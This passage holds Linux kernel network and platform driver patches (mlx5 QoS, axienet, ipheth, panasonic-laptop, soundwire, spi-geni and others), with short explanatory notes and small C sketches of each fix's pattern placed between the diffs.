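The reworked nix_smq_flush() brackets the flush symmetrically: save CIR/PIR shaper state and assert XOFF on sibling TL2s first, run the flush, then undo everything in reverse (restore rates, clear XOFF, re-enable the saved link bits). A stripped-down sketch of that save/zero/flush/restore discipline, with the registers reduced to an array:

#include <stdio.h>

#define NLEVELS 4

static unsigned long long regs[NLEVELS] = { 100, 200, 300, 400 };
static unsigned long long saved[NLEVELS];

int main(void)
{
	int i;

	/* save shaper state, then zero it so the queue can drain */
	for (i = 0; i < NLEVELS; i++) {
		saved[i] = regs[i];
		regs[i] = 0;
	}

	printf("flush runs here with all rate limits removed\n");

	/* restore exactly what was saved, leaving no side effects */
	for (i = 0; i < NLEVELS; i++)
		regs[i] = saved[i];

	printf("level 0 restored to %llu\n", regs[0]);
	return 0;
}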
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+index 3ee61987266c49..8cb127a6fabfed 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+@@ -136,6 +136,10 @@ void mlx5e_build_ptys2ethtool_map(void)
+ 				       ETHTOOL_LINK_MODE_100000baseKR4_Full_BIT);
+ 	MLX5_BUILD_PTYS2ETHTOOL_CONFIG(MLX5E_100GBASE_LR4, legacy,
+ 				       ETHTOOL_LINK_MODE_100000baseLR4_ER4_Full_BIT);
++	MLX5_BUILD_PTYS2ETHTOOL_CONFIG(MLX5E_100BASE_TX, legacy,
++				       ETHTOOL_LINK_MODE_100baseT_Full_BIT);
++	MLX5_BUILD_PTYS2ETHTOOL_CONFIG(MLX5E_1000BASE_T, legacy,
++				       ETHTOOL_LINK_MODE_1000baseT_Full_BIT);
+ 	MLX5_BUILD_PTYS2ETHTOOL_CONFIG(MLX5E_10GBASE_T, legacy,
+ 				       ETHTOOL_LINK_MODE_10000baseT_Full_BIT);
+ 	MLX5_BUILD_PTYS2ETHTOOL_CONFIG(MLX5E_25GBASE_CR, legacy,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/legacy.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/legacy.c
+index fabe49a35a5c96..a47e93caccb10c 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/legacy.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/legacy.c
+@@ -321,7 +321,7 @@ int mlx5_eswitch_set_vepa(struct mlx5_eswitch *esw, u8 setting)
+ 		return -EPERM;
+ 
+ 	mutex_lock(&esw->state_lock);
+-	if (esw->mode != MLX5_ESWITCH_LEGACY) {
++	if (esw->mode != MLX5_ESWITCH_LEGACY || !mlx5_esw_is_fdb_created(esw)) {
+ 		err = -EOPNOTSUPP;
+ 		goto out;
+ 	}
+@@ -341,7 +341,7 @@ int mlx5_eswitch_get_vepa(struct mlx5_eswitch *esw, u8 *setting)
+ 	if (!mlx5_esw_allowed(esw))
+ 		return -EPERM;
+ 
+-	if (esw->mode != MLX5_ESWITCH_LEGACY)
++	if (esw->mode != MLX5_ESWITCH_LEGACY || !mlx5_esw_is_fdb_created(esw))
+ 		return -EOPNOTSUPP;
+ 
+ 	*setting = esw->fdb_table.legacy.vepa_uplink_rule ? 1 : 0;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c
+index 75015d370922e6..a7400ed4956e6a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/qos.c
+@@ -311,6 +311,25 @@ static int esw_qos_set_group_max_rate(struct mlx5_eswitch *esw,
+ 	return err;
+ }
+ 
++static bool esw_qos_element_type_supported(struct mlx5_core_dev *dev, int type)
++{
++	switch (type) {
++	case SCHEDULING_CONTEXT_ELEMENT_TYPE_TSAR:
++		return MLX5_CAP_QOS(dev, esw_element_type) &
++		       ELEMENT_TYPE_CAP_MASK_TSAR;
++	case SCHEDULING_CONTEXT_ELEMENT_TYPE_VPORT:
++		return MLX5_CAP_QOS(dev, esw_element_type) &
++		       ELEMENT_TYPE_CAP_MASK_VPORT;
++	case SCHEDULING_CONTEXT_ELEMENT_TYPE_VPORT_TC:
++		return MLX5_CAP_QOS(dev, esw_element_type) &
++		       ELEMENT_TYPE_CAP_MASK_VPORT_TC;
++	case SCHEDULING_CONTEXT_ELEMENT_TYPE_PARA_VPORT_TC:
++		return MLX5_CAP_QOS(dev, esw_element_type) &
++		       ELEMENT_TYPE_CAP_MASK_PARA_VPORT_TC;
++	}
++	return false;
++}
++
+ static int esw_qos_vport_create_sched_element(struct mlx5_eswitch *esw,
+ 					      struct mlx5_vport *vport,
+ 					      u32 max_rate, u32 bw_share)
+@@ -322,6 +341,9 @@ static int esw_qos_vport_create_sched_element(struct mlx5_eswitch *esw,
+ 	void *vport_elem;
+ 	int err;
+ 
++	if (!esw_qos_element_type_supported(dev, SCHEDULING_CONTEXT_ELEMENT_TYPE_VPORT))
++		return -EOPNOTSUPP;
++
+ 	parent_tsar_ix = group ? group->tsar_ix : esw->qos.root_tsar_ix;
+ 	MLX5_SET(scheduling_context, sched_ctx, element_type,
+ 		 SCHEDULING_CONTEXT_ELEMENT_TYPE_VPORT);
+@@ -420,6 +442,7 @@ __esw_qos_create_rate_group(struct mlx5_eswitch *esw, struct netlink_ext_ack *ex
+ {
+ 	u32 tsar_ctx[MLX5_ST_SZ_DW(scheduling_context)] = {};
+ 	struct mlx5_esw_rate_group *group;
++	__be32 *attr;
+ 	u32 divider;
+ 	int err;
+ 
+@@ -427,6 +450,12 @@ __esw_qos_create_rate_group(struct mlx5_eswitch *esw, struct netlink_ext_ack *ex
+ 	if (!group)
+ 		return ERR_PTR(-ENOMEM);
+ 
++	MLX5_SET(scheduling_context, tsar_ctx, element_type,
++		 SCHEDULING_CONTEXT_ELEMENT_TYPE_TSAR);
++
++	attr = MLX5_ADDR_OF(scheduling_context, tsar_ctx, element_attributes);
++	*attr = cpu_to_be32(TSAR_ELEMENT_TSAR_TYPE_DWRR << 16);
++
+ 	MLX5_SET(scheduling_context, tsar_ctx, parent_element_id,
+ 		 esw->qos.root_tsar_ix);
+ 	err = mlx5_create_scheduling_element_cmd(esw->dev,
+@@ -525,25 +554,6 @@ static int esw_qos_destroy_rate_group(struct mlx5_eswitch *esw,
+ 	return err;
+ }
+ 
+-static bool esw_qos_element_type_supported(struct mlx5_core_dev *dev, int type)
+-{
+-	switch (type) {
+-	case SCHEDULING_CONTEXT_ELEMENT_TYPE_TSAR:
+-		return MLX5_CAP_QOS(dev, esw_element_type) &
+-		       ELEMENT_TYPE_CAP_MASK_TASR;
+-	case SCHEDULING_CONTEXT_ELEMENT_TYPE_VPORT:
+-		return MLX5_CAP_QOS(dev, esw_element_type) &
+-		       ELEMENT_TYPE_CAP_MASK_VPORT;
+-	case SCHEDULING_CONTEXT_ELEMENT_TYPE_VPORT_TC:
+-		return MLX5_CAP_QOS(dev, esw_element_type) &
+-		       ELEMENT_TYPE_CAP_MASK_VPORT_TC;
+-	case SCHEDULING_CONTEXT_ELEMENT_TYPE_PARA_VPORT_TC:
+-		return MLX5_CAP_QOS(dev, esw_element_type) &
+-		       ELEMENT_TYPE_CAP_MASK_PARA_VPORT_TC;
+-	}
+-	return false;
+-}
+-
+ static int esw_qos_create(struct mlx5_eswitch *esw, struct netlink_ext_ack *extack)
+ {
+ 	u32 tsar_ctx[MLX5_ST_SZ_DW(scheduling_context)] = {};
+@@ -554,7 +564,8 @@ static int esw_qos_create(struct mlx5_eswitch *esw, struct netlink_ext_ack *exta
+ 	if (!MLX5_CAP_GEN(dev, qos) || !MLX5_CAP_QOS(dev, esw_scheduling))
+ 		return -EOPNOTSUPP;
+ 
+-	if (!esw_qos_element_type_supported(dev, SCHEDULING_CONTEXT_ELEMENT_TYPE_TSAR))
++	if (!esw_qos_element_type_supported(dev, SCHEDULING_CONTEXT_ELEMENT_TYPE_TSAR) ||
++	    !(MLX5_CAP_QOS(dev, esw_tsar_type) & TSAR_TYPE_CAP_MASK_DWRR))
+ 		return -EOPNOTSUPP;
+ 
+ 	MLX5_SET(scheduling_context, tsar_ctx, element_type,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index 67849b1c0bb71e..76af59cfdd0e64 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -2025,6 +2025,7 @@ static const struct pci_device_id mlx5_core_pci_table[] = {
+ 	{ PCI_VDEVICE(MELLANOX, 0x101f) },			/* ConnectX-6 LX */
+ 	{ PCI_VDEVICE(MELLANOX, 0x1021) },			/* ConnectX-7 */
+ 	{ PCI_VDEVICE(MELLANOX, 0x1023) },			/* ConnectX-8 */
++	{ PCI_VDEVICE(MELLANOX, 0x1025) },			/* ConnectX-9 */
+ 	{ PCI_VDEVICE(MELLANOX, 0xa2d2) },			/* BlueField integrated ConnectX-5 network controller */
+ 	{ PCI_VDEVICE(MELLANOX, 0xa2d3), MLX5_PCI_DEV_IS_VF},	/* BlueField integrated ConnectX-5 network controller VF */
+ 	{ PCI_VDEVICE(MELLANOX, 0xa2d6) },			/* BlueField-2 integrated ConnectX-6 Dx network controller */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/qos.c b/drivers/net/ethernet/mellanox/mlx5/core/qos.c
+index 8bce730b5c5bef..db2bd3ad63ba36 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/qos.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/qos.c
+@@ -28,6 +28,9 @@ int mlx5_qos_create_leaf_node(struct mlx5_core_dev *mdev, u32 parent_id,
+ {
+ 	u32 sched_ctx[MLX5_ST_SZ_DW(scheduling_context)] = {0};
+ 
++	if (!(MLX5_CAP_QOS(mdev, nic_element_type) & ELEMENT_TYPE_CAP_MASK_QUEUE_GROUP))
++		return -EOPNOTSUPP;
++
+ 	MLX5_SET(scheduling_context, sched_ctx, parent_element_id, parent_id);
+ 	MLX5_SET(scheduling_context, sched_ctx, element_type,
+ 		 SCHEDULING_CONTEXT_ELEMENT_TYPE_QUEUE_GROUP);
+@@ -44,6 +47,10 @@ int mlx5_qos_create_inner_node(struct mlx5_core_dev *mdev, u32 parent_id,
+ 	u32 sched_ctx[MLX5_ST_SZ_DW(scheduling_context)] = {0};
+ 	void *attr;
+ 
++	if (!(MLX5_CAP_QOS(mdev, nic_element_type) & ELEMENT_TYPE_CAP_MASK_TSAR) ||
++	    !(MLX5_CAP_QOS(mdev, nic_tsar_type) & TSAR_TYPE_CAP_MASK_DWRR))
++		return -EOPNOTSUPP;
++
+ 	MLX5_SET(scheduling_context, sched_ctx, parent_element_id, parent_id);
+ 	MLX5_SET(scheduling_context, sched_ctx, element_type,
+ 		 SCHEDULING_CONTEXT_ELEMENT_TYPE_TSAR);
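
Both mlx5 qos entry points now gate on the firmware capability bits and return -EOPNOTSUPP before building the scheduling context, instead of letting the device reject the command later. The gate-early shape, sketched generically (the capability bit names are invented):

#include <stdio.h>
#include <errno.h>
#include <stdint.h>

#define CAP_TSAR	(1u << 0)
#define CAP_DWRR	(1u << 1)

static int create_tsar(uint32_t caps)
{
	/* refuse up front if the device cannot do what we are about to ask */
	if (!(caps & CAP_TSAR) || !(caps & CAP_DWRR))
		return -EOPNOTSUPP;
	printf("scheduling element created\n");
	return 0;
}

int main(void)
{
	printf("ret = %d\n", create_tsar(CAP_TSAR));		/* -EOPNOTSUPP */
	printf("ret = %d\n", create_tsar(CAP_TSAR | CAP_DWRR));	/* 0 */
	return 0;
}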
+diff --git a/drivers/net/ethernet/xilinx/xilinx_axienet.h b/drivers/net/ethernet/xilinx/xilinx_axienet.h
+index 503c32413474a2..deb94c26c605b0 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_axienet.h
++++ b/drivers/net/ethernet/xilinx/xilinx_axienet.h
+@@ -419,6 +419,8 @@ struct axidma_bd {
+  * @tx_bytes:	TX byte count for statistics
+  * @tx_stat_sync: Synchronization object for TX stats
+  * @dma_err_task: Work structure to process Axi DMA errors
++ * @stopping:   Set when @dma_err_task shouldn't do anything because we are
++ *              about to stop the device.
+  * @tx_irq:	Axidma TX IRQ number
+  * @rx_irq:	Axidma RX IRQ number
+  * @eth_irq:	Ethernet core IRQ number
+@@ -481,6 +483,7 @@ struct axienet_local {
+ 	struct u64_stats_sync tx_stat_sync;
+ 
+ 	struct work_struct dma_err_task;
++	bool stopping;
+ 
+ 	int tx_irq;
+ 	int rx_irq;
+diff --git a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+index 59d1cfbf7d6b78..b631d80de33707 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
++++ b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+@@ -1161,6 +1161,7 @@ static int axienet_open(struct net_device *ndev)
+ 	phylink_start(lp->phylink);
+ 
+ 	/* Enable worker thread for Axi DMA error handling */
++	lp->stopping = false;
+ 	INIT_WORK(&lp->dma_err_task, axienet_dma_err_handler);
+ 
+ 	napi_enable(&lp->napi_rx);
+@@ -1216,6 +1217,9 @@ static int axienet_stop(struct net_device *ndev)
+ 
+ 	dev_dbg(&ndev->dev, "axienet_close()\n");
+ 
++	WRITE_ONCE(lp->stopping, true);
++	flush_work(&lp->dma_err_task);
++
+ 	napi_disable(&lp->napi_tx);
+ 	napi_disable(&lp->napi_rx);
+ 
+@@ -1760,6 +1764,10 @@ static void axienet_dma_err_handler(struct work_struct *work)
+ 						dma_err_task);
+ 	struct net_device *ndev = lp->ndev;
+ 
++	/* Don't bother if we are going to stop anyway */
++	if (READ_ONCE(lp->stopping))
++		return;
++
+ 	napi_disable(&lp->napi_tx);
+ 	napi_disable(&lp->napi_rx);
+ 
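
The axienet fix is the usual teardown ordering for a self-arming error worker: publish a stopping flag, flush the work so any running instance completes, and have the handler bail out early when it sees the flag. A rough userspace analogue (pthread_join() stands in for flush_work(), and C11 atomics stand in for WRITE_ONCE/READ_ONCE):

#include <pthread.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

static atomic_bool stopping;

static void *err_handler(void *arg)
{
	(void)arg;
	/* don't bother if we are going to stop anyway */
	if (atomic_load(&stopping))
		return NULL;
	printf("error recovery would run here\n");
	return NULL;
}

int main(void)
{
	pthread_t worker;

	atomic_store(&stopping, true);	/* like WRITE_ONCE(lp->stopping, true) */
	pthread_create(&worker, NULL, err_handler, NULL);
	pthread_join(&worker, NULL);	/* stands in for flush_work() */
	printf("now safe to tear the device down\n");
	return 0;
}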
+diff --git a/drivers/net/phy/vitesse.c b/drivers/net/phy/vitesse.c
+index 897b979ec03c81..3b5fcaf0dd36db 100644
+--- a/drivers/net/phy/vitesse.c
++++ b/drivers/net/phy/vitesse.c
+@@ -237,16 +237,6 @@ static int vsc739x_config_init(struct phy_device *phydev)
+ 	return 0;
+ }
+ 
+-static int vsc73xx_config_aneg(struct phy_device *phydev)
+-{
+-	/* The VSC73xx switches does not like to be instructed to
+-	 * do autonegotiation in any way, it prefers that you just go
+-	 * with the power-on/reset defaults. Writing some registers will
+-	 * just make autonegotiation permanently fail.
+-	 */
+-	return 0;
+-}
+-
+ /* This adds a skew for both TX and RX clocks, so the skew should only be
+  * applied to "rgmii-id" interfaces. It may not work as expected
+  * on "rgmii-txid", "rgmii-rxid" or "rgmii" interfaces.
+@@ -444,7 +434,6 @@ static struct phy_driver vsc82xx_driver[] = {
+ 	.phy_id_mask    = 0x000ffff0,
+ 	/* PHY_GBIT_FEATURES */
+ 	.config_init    = vsc738x_config_init,
+-	.config_aneg    = vsc73xx_config_aneg,
+ 	.read_page      = vsc73xx_read_page,
+ 	.write_page     = vsc73xx_write_page,
+ }, {
+@@ -453,7 +442,6 @@ static struct phy_driver vsc82xx_driver[] = {
+ 	.phy_id_mask    = 0x000ffff0,
+ 	/* PHY_GBIT_FEATURES */
+ 	.config_init    = vsc738x_config_init,
+-	.config_aneg    = vsc73xx_config_aneg,
+ 	.read_page      = vsc73xx_read_page,
+ 	.write_page     = vsc73xx_write_page,
+ }, {
+@@ -462,7 +450,6 @@ static struct phy_driver vsc82xx_driver[] = {
+ 	.phy_id_mask    = 0x000ffff0,
+ 	/* PHY_GBIT_FEATURES */
+ 	.config_init    = vsc739x_config_init,
+-	.config_aneg    = vsc73xx_config_aneg,
+ 	.read_page      = vsc73xx_read_page,
+ 	.write_page     = vsc73xx_write_page,
+ }, {
+@@ -471,7 +458,6 @@ static struct phy_driver vsc82xx_driver[] = {
+ 	.phy_id_mask    = 0x000ffff0,
+ 	/* PHY_GBIT_FEATURES */
+ 	.config_init    = vsc739x_config_init,
+-	.config_aneg    = vsc73xx_config_aneg,
+ 	.read_page      = vsc73xx_read_page,
+ 	.write_page     = vsc73xx_write_page,
+ }, {
+diff --git a/drivers/net/usb/ipheth.c b/drivers/net/usb/ipheth.c
+index 13381d87eeb095..17844c07305c39 100644
+--- a/drivers/net/usb/ipheth.c
++++ b/drivers/net/usb/ipheth.c
+@@ -253,13 +253,14 @@ static int ipheth_carrier_set(struct ipheth_device *dev)
+ 			0x02, /* index */
+ 			dev->ctrl_buf, IPHETH_CTRL_BUF_SIZE,
+ 			IPHETH_CTRL_TIMEOUT);
+-	if (retval < 0) {
++	if (retval <= 0) {
+ 		dev_err(&dev->intf->dev, "%s: usb_control_msg: %d\n",
+ 			__func__, retval);
+ 		return retval;
+ 	}
+ 
+-	if (dev->ctrl_buf[0] == IPHETH_CARRIER_ON) {
++	if ((retval == 1 && dev->ctrl_buf[0] == IPHETH_CARRIER_ON) ||
++	    (retval >= 2 && dev->ctrl_buf[1] == IPHETH_CARRIER_ON)) {
+ 		netif_carrier_on(dev->net);
+ 		if (dev->tx_urb->status != -EINPROGRESS)
+ 			netif_wake_queue(dev->net);
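
usb_control_msg() returns the number of bytes actually transferred, so the fix treats 0 as a failure and inspects ctrl_buf[1] only when at least two bytes arrived; indexing a short reply was the underlying bug. A minimal sketch of length-checked reply parsing (the transfer function and the CARRIER_ON value are stand-ins):

#include <stdio.h>

#define CARRIER_ON 0x04	/* illustrative value, not taken from the driver */

/* stand-in for usb_control_msg(): returns bytes transferred, or < 0 */
static int control_read(unsigned char *buf, int want)
{
	if (want < 2)
		return -1;
	buf[0] = 0x00;
	buf[1] = CARRIER_ON;
	return 2;
}

int main(void)
{
	unsigned char buf[8];
	int n = control_read(buf, sizeof(buf));

	if (n <= 0) {
		fprintf(stderr, "control message failed: %d\n", n);
		return 1;
	}
	/* only touch buf[1] if the device actually sent two bytes */
	if ((n == 1 && buf[0] == CARRIER_ON) ||
	    (n >= 2 && buf[1] == CARRIER_ON))
		printf("carrier on\n");
	return 0;
}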
+diff --git a/drivers/pinctrl/intel/pinctrl-meteorlake.c b/drivers/pinctrl/intel/pinctrl-meteorlake.c
+index 9576dcd1cb2997..84ea62cb86c6ea 100644
+--- a/drivers/pinctrl/intel/pinctrl-meteorlake.c
++++ b/drivers/pinctrl/intel/pinctrl-meteorlake.c
+@@ -395,6 +395,7 @@ static const struct intel_pinctrl_soc_data mtlp_soc_data = {
+ };
+ 
+ static const struct acpi_device_id mtl_pinctrl_acpi_match[] = {
++	{ "INTC105E", (kernel_ulong_t)&mtlp_soc_data },
+ 	{ "INTC1083", (kernel_ulong_t)&mtlp_soc_data },
+ 	{ }
+ };
+diff --git a/drivers/platform/surface/surface_aggregator_registry.c b/drivers/platform/surface/surface_aggregator_registry.c
+index 023f126121d7d0..fafb0bb49f7f62 100644
+--- a/drivers/platform/surface/surface_aggregator_registry.c
++++ b/drivers/platform/surface/surface_aggregator_registry.c
+@@ -298,7 +298,7 @@ static const struct software_node *ssam_node_group_sp8[] = {
+ 	NULL,
+ };
+ 
+-/* Devices for Surface Pro 9 */
++/* Devices for Surface Pro 9 and 10 */
+ static const struct software_node *ssam_node_group_sp9[] = {
+ 	&ssam_node_root,
+ 	&ssam_node_hub_kip,
+@@ -337,6 +337,9 @@ static const struct acpi_device_id ssam_platform_hub_match[] = {
+ 	/* Surface Pro 9 */
+ 	{ "MSHW0343", (unsigned long)ssam_node_group_sp9 },
+ 
++	/* Surface Pro 10 */
++	{ "MSHW0510", (unsigned long)ssam_node_group_sp9 },
++
+ 	/* Surface Book 2 */
+ 	{ "MSHW0107", (unsigned long)ssam_node_group_gen5 },
+ 
+@@ -367,6 +370,9 @@ static const struct acpi_device_id ssam_platform_hub_match[] = {
+ 	/* Surface Laptop Go 2 */
+ 	{ "MSHW0290", (unsigned long)ssam_node_group_slg1 },
+ 
++	/* Surface Laptop Go 3 */
++	{ "MSHW0440", (unsigned long)ssam_node_group_slg1 },
++
+ 	/* Surface Laptop Studio */
+ 	{ "MSHW0123", (unsigned long)ssam_node_group_sls },
+ 
+diff --git a/drivers/platform/x86/panasonic-laptop.c b/drivers/platform/x86/panasonic-laptop.c
+index ad3083f9946d4d..ac7fb7a8fd592e 100644
+--- a/drivers/platform/x86/panasonic-laptop.c
++++ b/drivers/platform/x86/panasonic-laptop.c
+@@ -337,7 +337,8 @@ static int acpi_pcc_retrieve_biosdata(struct pcc_acpi *pcc)
+ 	}
+ 
+ 	if (pcc->num_sifr < hkey->package.count) {
+-		pr_err("SQTY reports bad SINF length\n");
++		pr_err("SQTY reports bad SINF length SQTY: %lu SINF-pkg-count: %u\n",
++		       pcc->num_sifr, hkey->package.count);
+ 		status = AE_ERROR;
+ 		goto end;
+ 	}
+@@ -773,6 +774,24 @@ static DEVICE_ATTR_RW(dc_brightness);
+ static DEVICE_ATTR_RW(current_brightness);
+ static DEVICE_ATTR_RW(cdpower);
+ 
++static umode_t pcc_sysfs_is_visible(struct kobject *kobj, struct attribute *attr, int idx)
++{
++	struct device *dev = kobj_to_dev(kobj);
++	struct acpi_device *acpi = to_acpi_device(dev);
++	struct pcc_acpi *pcc = acpi_driver_data(acpi);
++
++	if (attr == &dev_attr_mute.attr)
++		return (pcc->num_sifr > SINF_MUTE) ? attr->mode : 0;
++
++	if (attr == &dev_attr_eco_mode.attr)
++		return (pcc->num_sifr > SINF_ECO_MODE) ? attr->mode : 0;
++
++	if (attr == &dev_attr_current_brightness.attr)
++		return (pcc->num_sifr > SINF_CUR_BRIGHT) ? attr->mode : 0;
++
++	return attr->mode;
++}
++
+ static struct attribute *pcc_sysfs_entries[] = {
+ 	&dev_attr_numbatt.attr,
+ 	&dev_attr_lcdtype.attr,
+@@ -787,8 +806,9 @@ static struct attribute *pcc_sysfs_entries[] = {
+ };
+ 
+ static const struct attribute_group pcc_attr_group = {
+-	.name	= NULL,		/* put in device directory */
+-	.attrs	= pcc_sysfs_entries,
++	.name		= NULL,		/* put in device directory */
++	.attrs		= pcc_sysfs_entries,
++	.is_visible	= pcc_sysfs_is_visible,
+ };
+ 
+ 
+@@ -941,12 +961,15 @@ static int acpi_pcc_hotkey_resume(struct device *dev)
+ 	if (!pcc)
+ 		return -EINVAL;
+ 
+-	acpi_pcc_write_sset(pcc, SINF_MUTE, pcc->mute);
+-	acpi_pcc_write_sset(pcc, SINF_ECO_MODE, pcc->eco_mode);
++	if (pcc->num_sifr > SINF_MUTE)
++		acpi_pcc_write_sset(pcc, SINF_MUTE, pcc->mute);
++	if (pcc->num_sifr > SINF_ECO_MODE)
++		acpi_pcc_write_sset(pcc, SINF_ECO_MODE, pcc->eco_mode);
+ 	acpi_pcc_write_sset(pcc, SINF_STICKY_KEY, pcc->sticky_key);
+ 	acpi_pcc_write_sset(pcc, SINF_AC_CUR_BRIGHT, pcc->ac_brightness);
+ 	acpi_pcc_write_sset(pcc, SINF_DC_CUR_BRIGHT, pcc->dc_brightness);
+-	acpi_pcc_write_sset(pcc, SINF_CUR_BRIGHT, pcc->current_brightness);
++	if (pcc->num_sifr > SINF_CUR_BRIGHT)
++		acpi_pcc_write_sset(pcc, SINF_CUR_BRIGHT, pcc->current_brightness);
+ 
+ 	return 0;
+ }
+@@ -963,11 +986,21 @@ static int acpi_pcc_hotkey_add(struct acpi_device *device)
+ 
+ 	num_sifr = acpi_pcc_get_sqty(device);
+ 
+-	if (num_sifr < 0 || num_sifr > 255) {
+-		pr_err("num_sifr out of range");
++	/*
++	 * pcc->sinf is expected to at least have the AC+DC brightness entries.
++	 * Accesses to higher SINF entries are checked against num_sifr.
++	 */
++	if (num_sifr <= SINF_DC_CUR_BRIGHT || num_sifr > 255) {
++		pr_err("num_sifr %d out of range %d - 255\n", num_sifr, SINF_DC_CUR_BRIGHT + 1);
+ 		return -ENODEV;
+ 	}
+ 
++	/*
++	 * Some DSDTs have an off-by-one bug where the SINF package count is
++	 * one higher than the SQTY-reported value, so allocate one extra entry.
++	 */
++	num_sifr++;
++
+ 	pcc = kzalloc(sizeof(struct pcc_acpi), GFP_KERNEL);
+ 	if (!pcc) {
+ 		pr_err("Couldn't allocate mem for pcc");
+@@ -1020,11 +1053,14 @@ static int acpi_pcc_hotkey_add(struct acpi_device *device)
+ 	acpi_pcc_write_sset(pcc, SINF_STICKY_KEY, 0);
+ 	pcc->sticky_key = 0;
+ 
+-	pcc->eco_mode = pcc->sinf[SINF_ECO_MODE];
+-	pcc->mute = pcc->sinf[SINF_MUTE];
+ 	pcc->ac_brightness = pcc->sinf[SINF_AC_CUR_BRIGHT];
+ 	pcc->dc_brightness = pcc->sinf[SINF_DC_CUR_BRIGHT];
+-	pcc->current_brightness = pcc->sinf[SINF_CUR_BRIGHT];
++	if (pcc->num_sifr > SINF_MUTE)
++		pcc->mute = pcc->sinf[SINF_MUTE];
++	if (pcc->num_sifr > SINF_ECO_MODE)
++		pcc->eco_mode = pcc->sinf[SINF_ECO_MODE];
++	if (pcc->num_sifr > SINF_CUR_BRIGHT)
++		pcc->current_brightness = pcc->sinf[SINF_CUR_BRIGHT];
+ 
+ 	/* add sysfs attributes */
+ 	result = sysfs_create_group(&device->dev.kobj, &pcc_attr_group);
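
The is_visible() callback lets one static attribute array serve firmware variants with different SINF table lengths: an attribute's mode is returned only when pcc->num_sifr shows the backing entry exists, and returning 0 hides the file entirely. The mechanism reduced to its core (the index value is illustrative):

#include <stdio.h>

#define SINF_MUTE	6	/* illustrative index, not the driver's value */
#define MODE_RW		0644

/* return the attribute's mode only when the firmware table backs it */
static unsigned int mute_visible(int num_sifr)
{
	return num_sifr > SINF_MUTE ? MODE_RW : 0;
}

int main(void)
{
	printf("short table: %o\n", mute_visible(5));	/* 0: hidden */
	printf("full table : %o\n", mute_visible(9));	/* 644: visible */
	return 0;
}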
+diff --git a/drivers/soc/ti/omap_prm.c b/drivers/soc/ti/omap_prm.c
+index 913b964374a444..33ef58195955db 100644
+--- a/drivers/soc/ti/omap_prm.c
++++ b/drivers/soc/ti/omap_prm.c
+@@ -696,6 +696,8 @@ static int omap_prm_domain_init(struct device *dev, struct omap_prm *prm)
+ 	data = prm->data;
+ 	name = devm_kasprintf(dev, GFP_KERNEL, "prm_%s",
+ 			      data->name);
++	if (!name)
++		return -ENOMEM;
+ 
+ 	prmd->dev = dev;
+ 	prmd->prm = prm;
+diff --git a/drivers/soundwire/stream.c b/drivers/soundwire/stream.c
+index 2a245f3b7738f6..2624441d2fa92c 100644
+--- a/drivers/soundwire/stream.c
++++ b/drivers/soundwire/stream.c
+@@ -1272,18 +1272,18 @@ struct sdw_dpn_prop *sdw_get_slave_dpn_prop(struct sdw_slave *slave,
+ 					    unsigned int port_num)
+ {
+ 	struct sdw_dpn_prop *dpn_prop;
+-	unsigned long mask;
++	u8 num_ports;
+ 	int i;
+ 
+ 	if (direction == SDW_DATA_DIR_TX) {
+-		mask = slave->prop.source_ports;
++		num_ports = hweight32(slave->prop.source_ports);
+ 		dpn_prop = slave->prop.src_dpn_prop;
+ 	} else {
+-		mask = slave->prop.sink_ports;
++		num_ports = hweight32(slave->prop.sink_ports);
+ 		dpn_prop = slave->prop.sink_dpn_prop;
+ 	}
+ 
+-	for_each_set_bit(i, &mask, 32) {
++	for (i = 0; i < num_ports; i++) {
+ 		if (dpn_prop[i].num == port_num)
+ 			return &dpn_prop[i];
+ 	}
+diff --git a/drivers/spi/spi-geni-qcom.c b/drivers/spi/spi-geni-qcom.c
+index 7b76dcd11e2bb5..17b5299c18c731 100644
+--- a/drivers/spi/spi-geni-qcom.c
++++ b/drivers/spi/spi-geni-qcom.c
+@@ -954,22 +954,24 @@ static int spi_geni_probe(struct platform_device *pdev)
+ 	spin_lock_init(&mas->lock);
+ 	pm_runtime_use_autosuspend(&pdev->dev);
+ 	pm_runtime_set_autosuspend_delay(&pdev->dev, 250);
+-	pm_runtime_enable(dev);
++	ret = devm_pm_runtime_enable(dev);
++	if (ret)
++		return ret;
+ 
+ 	ret = geni_icc_get(&mas->se, NULL);
+ 	if (ret)
+-		goto spi_geni_probe_runtime_disable;
++		return ret;
+ 	/* Set the bus quota to a reasonable value for register access */
+ 	mas->se.icc_paths[GENI_TO_CORE].avg_bw = Bps_to_icc(CORE_2X_50_MHZ);
+ 	mas->se.icc_paths[CPU_TO_GENI].avg_bw = GENI_DEFAULT_BW;
+ 
+ 	ret = geni_icc_set_bw(&mas->se);
+ 	if (ret)
+-		goto spi_geni_probe_runtime_disable;
++		return ret;
+ 
+ 	ret = spi_geni_init(mas);
+ 	if (ret)
+-		goto spi_geni_probe_runtime_disable;
++		return ret;
+ 
+ 	/*
+ 	 * check the mode supported and set_cs for fifo mode only
+@@ -998,12 +1000,10 @@ static int spi_geni_probe(struct platform_device *pdev)
+ 	free_irq(mas->irq, spi);
+ spi_geni_release_dma:
+ 	spi_geni_release_dma_chan(mas);
